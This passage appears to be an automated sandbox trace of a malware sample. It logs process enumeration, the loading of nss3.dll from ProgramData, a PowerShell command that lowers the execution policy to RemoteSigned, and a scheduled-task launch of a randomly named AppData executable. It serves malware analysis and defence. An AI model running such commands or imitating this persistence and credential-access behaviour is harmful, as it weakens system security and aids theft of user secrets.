th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.405] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.406] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.406] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.407] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="herb cos completed.exe")) returned 1 [0136.407] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x71c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dealers.exe")) returned 1 [0136.407] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hall-stronger.exe")) returned 1 [0136.408] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rp-hip.exe")) returned 1 [0136.408] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="karma_coat.exe")) returned 1 [0136.409] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="plenty_leather.exe")) returned 1 [0136.409] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrytrackbackspatent.exe")) returned 1 [0136.410] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="busy.exe")) returned 1 [0136.410] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sudan_territory.exe")) returned 1 [0136.411] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="catalogs intelligent.exe")) returned 1 [0136.411] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="prisonermounted.exe")) returned 1 [0136.412] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extensive.exe")) returned 1 [0136.412] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="posters-baker-lift.exe")) returned 1 [0136.413] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="emperor_respected.exe")) returned 1 [0136.413] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="illinois indicated regional.exe")) returned 1 [0136.414] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="apartmentscontemporary.exe")) returned 1 [0136.414] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="witch-feat.exe")) returned 1 [0136.415] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0136.415] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0136.416] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0136.450] SetEnvironmentVariableA (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\ProgramData") returned 1 [0136.450] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0350 | out: hHeap=0x6c90000) returned 1 [0136.450] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c913b8 | out: hHeap=0x6c90000) returned 1 [0136.450] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91380 [0136.450] LoadLibraryA (lpLibFileName="C:\\ProgramData\\nss3.dll") Thread: id = 128 os_tid = 0x78c Thread: id = 129 os_tid = 0x648 Thread: id = 130 os_tid = 0xac8 Thread: id = 131 os_tid = 0xa00 Thread: id = 132 os_tid = 0xb64 Thread: id = 133 os_tid = 0x600 Thread: id = 134 os_tid = 0x5b8 Process: id = "12" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x32526000" os_pid = "0xab8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x43c" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0xabc Thread: id = 116 os_tid = 0x244 Thread: id = 117 os_tid = 0x7e4 Thread: id = 127 os_tid = 0xa50 Process: id = "13" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x32f9b000" os_pid = "0x4fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {C6E8520F-0CC3-406E-9256-15B1BD43C663} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0x694 Thread: id = 120 os_tid = 0x51c Thread: id = 122 os_tid = 0x5d4 Thread: id = 123 os_tid = 0x518 Thread: id = 124 os_tid = 0x834 Thread: id = 125 os_tid = 0x954 Thread: id = 126 os_tid = 0xad0 Process: id = "14" image_name = "oqrosnesyxcditex.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\a14790f6-2e96-4184-8635-958462b07e84\\oqrosnesyxcditex.exe" page_root = "0x6b8a9000" os_pid = "0xacc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x4fc" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 135 os_tid = 0x998 Thread: id = 137 os_tid = 0x9bc